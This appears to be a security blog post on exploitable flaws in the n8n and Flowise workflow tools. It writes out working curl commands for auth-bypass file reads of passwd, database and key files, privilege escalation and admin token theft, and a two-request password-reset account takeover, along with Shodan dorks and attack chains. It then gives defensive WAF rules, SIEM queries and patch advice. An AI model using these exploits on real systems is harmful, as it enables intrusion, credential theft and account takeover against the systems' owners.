TL;DR
Working exploits exist, attack surface is growing, and with AI accelerating exploit development, the window between disclosure and active campaigns is collapsing. The tools securing our AI workflows need securing themselves.
- n8n: Patched auth bypass + directory traversal chain (2023), low wild exploitation
- Flowwise: CRITICAL unpatched account takeover (CVE-2025-58434, 9.8), trivial to exploit
- Neither in CISA KEV yet, but both have public PoCs
- Shodan dorks available, attack surface is significant
**Key Takeaways
- Workflow automation tools = massive attack surface: Single compromise → access to ALL integrated systems
- Authentication bypasses + file reads = critical chains: n8n demonstrates perfect chain
- Flowwise CVE-2025-58434 is actively exploitable RIGHT NOW with no patch
- AI/LLM tools moving fast, security lagging: Expect more Langflow-style incidents
- Defense in depth essential: Don’t rely on application security alone
n8n - Workflow Automation Platform
Vulnerability Chain (CVE-2023-27562 + CVE-2023-27564)
Versions: ≤ 0.215.2 | Patched: 0.216.1 | CVSS: 6.5
Attack Flow
1. Auth Bypass: Append ".svg" to any /api/v1/* endpoint
2. Directory Traversal: /rest/data/filesystem:../../etc/passwd:.svg
3. Result: Unauthenticated arbitrary file read
Critical Targets
database.sqlite- SQLite deployments expose:- Bcrypt password hashes
- Encryption keys (in plaintext)
- Workflow credentials
- API tokens
Exploitation Examples
# Unauthenticated file read
curl -k 'https://target.com/rest/data/filesystem:..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg'
# Extract encryption key
curl -k 'https://target.com/rest/credential-translation?credentialType=../../../../../config/encryption.key'
# Dump SQLite database
curl -k 'https://target.com/rest/data/filesystem:..%2F..%2F.n8n%2Fdatabase.sqlite:.svg'CVE-2023-27563 - Mass Assignment (CVSS 6.5)
Authenticated users can modify their own or other users’ attributes via /rest/me endpoint, enabling privilege escalation to owner role and password changes for any account.
# Privilege escalation
curl -X PATCH 'https://target.com/rest/me' \
-H 'Content-Type: application/json' \
-b 'n8n-auth=<token>' \
--data '{"globalRole":{"id":1}}'
# Steal admin JWT
curl -X PATCH 'https://target.com/rest/me' \
-b 'n8n-auth=<low_priv_token>' \
--data '{"id":"<admin_uuid>","email":"admin@target.com"}'
# Response Set-Cookie contains admin JWTDetection Indicators
# Web logs
- URI contains: "filesystem:" followed by "../"
- URI contains: ".svg" on /api/v1/* endpoints
- URI: /rest/credential-translation with "../" in credentialType param
- Unexpected PATCH requests to /rest/me with role modifications
# Network
- Unusual file extensions in /rest/data/ requests
- Multiple failed auth followed by .svg bypass attemptsShodan Dork
http.title:"n8n" http.favicon.hash:-2051052918
Flowwise - LLM Workflow Builder
CVE-2025-58434 - Password Reset Token Disclosure
Versions: < 3.0.5 | Status: UNPATCHED | CVSS: 9.8 (CRITICAL)
Attack Vector
The /api/v1/account/forgot-password endpoint returns the password reset token directly in the API response instead of sending it via email, enabling immediate account takeover.
Exploitation (2 HTTP Requests)
# Step 1: Request reset token
curl -X POST 'https://target.flowiseai.com/api/v1/account/forgot-password' \
-H 'Content-Type: application/json' \
-d '{"email":"victim@company.com"}'
# Response contains:
{
"userId": "...",
"email": "victim@company.com",
"tempToken": "abc123...", # ← LEAKED
"tokenExpiry": "..."
}
# Step 2: Reset password
curl -X POST 'https://target.flowiseai.com/api/v1/account/reset-password' \
-H 'Content-Type: application/json' \
-d '{"token":"abc123...","password":"pwned123"}'Impact
- No authentication required
- No user interaction required
- Only need target email (OSINT/enumeration)
- Affects cloud AND self-hosted instances
- Admin accounts equally vulnerable
CVE-2024-31621 - Case-Sensitive Auth Bypass
Versions: ≤ 1.6.5 | Patched: > 1.6.5 | CVSS: 7.6
Authentication middleware only checks for lowercase ‘/api/v1’ in URLs, allowing bypass by using uppercase variations.
# Bypass authentication
curl 'https://target.com/Api/v1/credentials'
curl 'https://target.com/API/V1/credentials'
curl 'https://target.com/api/V1/workflows'CVE-2025-26319 - Arbitrary File Upload
Versions: ≤ 2.2.6 | CVSS: 10.0
Perfect severity score - allows unrestricted file upload leading to RCE.
Detection Indicators
# High-confidence IOCs
- POST /api/v1/account/forgot-password with enumeration patterns
- Rapid password resets across multiple accounts
- Mixed-case /API/V1/* requests
- Login from new IPs immediately after password reset
# Response anomalies
- forgot-password responses > 1KB (leaking tokens)
- Set-Cookie headers on forgot-password endpointsShodan Dork
http.title:"Flowise" OR http.title:"FlowiseAI"
http.favicon.hash:-2051052918 # Same as old Flowwise versions
Reconnaissance & Enumeration
Identifying Vulnerable Instances
# n8n version disclosure
curl -s https://target.com/api/v1/config | jq -r '.version'
# Flowwise version
curl -s https://target.com/api/v1/version
# Check auth bypass (n8n)
curl -s https://target.com/rest/data/filesystem:test:.svg
# 404 = vulnerable, 401/403 = patched or mitigated
# Check password reset leak (Flowwise)
curl -X POST https://target.com/api/v1/account/forgot-password \
-H 'Content-Type: application/json' \
-d '{"email":"nonexistent@test.com"}' | jq .
# Contains tempToken = CRITICALUser Enumeration
# n8n - timing attack on /rest/login
# Flowwise - forgot-password responses differ for valid/invalid usersAttack Chains
n8n: Initial Access → Domain Admin
- Recon: Shodan → identify exposed n8n instances
- Version Check: Confirm ≤ 0.215.2
- File Exfil: Extract
database.sqlitevia auth bypass - Credential Extraction:
- Crack bcrypt hashes offline
- Extract encryption keys
- Decrypt stored credentials (AWS, GitHub, DB creds)
- Lateral Movement: Use extracted creds to access production systems
- Persistence: Create backdoor workflows, modify webhooks
Flowwise: Account Takeover → Data Exfiltration
- Recon: Identify Flowwise instance < 3.0.5
- Email Enumeration: OSINT target emails (LinkedIn, etc.)
- Token Leak: Request password reset for admin account
- Account Takeover: Use leaked token to reset password
- Data Access: Access all AI workflows, prompts, API keys
- Supply Chain: Inject malicious AI workflows for downstream attacks
Blue Team: Defense & Detection
Immediate Actions
# n8n
- Upgrade to ≥ 0.216.1 immediately
- Rotate all encryption keys
- Force password resets if < 0.216.1 was ever deployed
- Audit workflow permissions
# Flowwise
- URGENT: Disable /api/v1/account/forgot-password via WAF/reverse proxy
- Monitor for exploitation attempts (see IOCs above)
- Implement rate limiting on password reset endpoints
- Deploy MFA on all accounts
- Upgrade to 3.0.5+ when availableWAF/Proxy Rules
# Block n8n auth bypass attempts
location ~ /rest/data/filesystem:.*\.svg {
deny all;
}
location ~ /rest/credential-translation {
if ($args ~* "\.\./") {
return 403;
}
}
# Block Flowwise password reset endpoint (temporary)
location = /api/v1/account/forgot-password {
deny all;
# Return 503 with maintenance message
}SIEM Detection Rules
-- n8n exploitation attempts
SELECT * FROM web_logs
WHERE (uri LIKE '%filesystem:%' AND uri LIKE '%../%')
OR (uri LIKE '%/rest/credential-translation%' AND uri LIKE '%../%')
OR (uri LIKE '%/api/v1/%' AND uri REGEXP '.*svg$')
-- Flowwise mass exploitation
SELECT COUNT(*) as reset_count, source_ip
FROM web_logs
WHERE uri = '/api/v1/account/forgot-password'
AND method = 'POST'
GROUP BY source_ip
HAVING reset_count > 5
AND timeframe < 60 -- within 60 secondsExploitation Status: Why Not in CISA KEV?
In 2024-2025, only ~1% of published CVEs are exploited in the wild, with 23.6% weaponized within 24 hours of disclosure. KEV addition requires confirmed exploitation evidence from trusted sources.
Likely reasons:
- Limited attack surface (niche enterprise tools)
- Require authentication context (n8n)
- Flowwise CVE-2025-58434 too recent (disclosed weeks ago)
- No public campaigns attributed yet
Reality check: With AI-assisted exploit development generating working PoCs in under 15 minutes, the gap between disclosure and active exploitation is shrinking rapidly.
Related Attack Vectors
LLM Workflow Tools Trend
Similar exploitation: Langflow CVE-2025-3248 (RCE) actively exploited to deliver Flodrix botnet. CISA added to KEV catalog May 2025. Same attack pattern: unauthenticated API → RCE → botnet deployment.
Pattern: AI/LLM workflow tools prioritize functionality over security → late-stage security audits → critical vulns in production
Resources & References
Nuclei Templates
nuclei -u https://target.com -t cves/2024/CVE-2024-31621.yamlGitHub PoCs
- CVE-2024-31621:
exploit-db.com/exploits/52001 - CVE-2023-27562/27564: Synacktiv advisory (full technical details)
Vendor Security
- n8n:
github.com/n8n-io/n8n/security/advisories - Flowwise:
github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph
**Key Takeaways
- Workflow automation tools = massive attack surface: Single compromise → access to ALL integrated systems
- Authentication bypasses + file reads = critical chains: n8n demonstrates perfect chain
- Flowwise CVE-2025-58434 is actively exploitable RIGHT NOW with no patch
- AI/LLM tools moving fast, security lagging: Expect more Langflow-style incidents
- Defense in depth essential: Don’t rely on application security alone
Action Items:
- Scan your network for these platforms TODAY
- Update n8n immediately
- If running Flowwise < 3.0.5, isolate or disable until patched
- Implement monitoring for exploitation indicators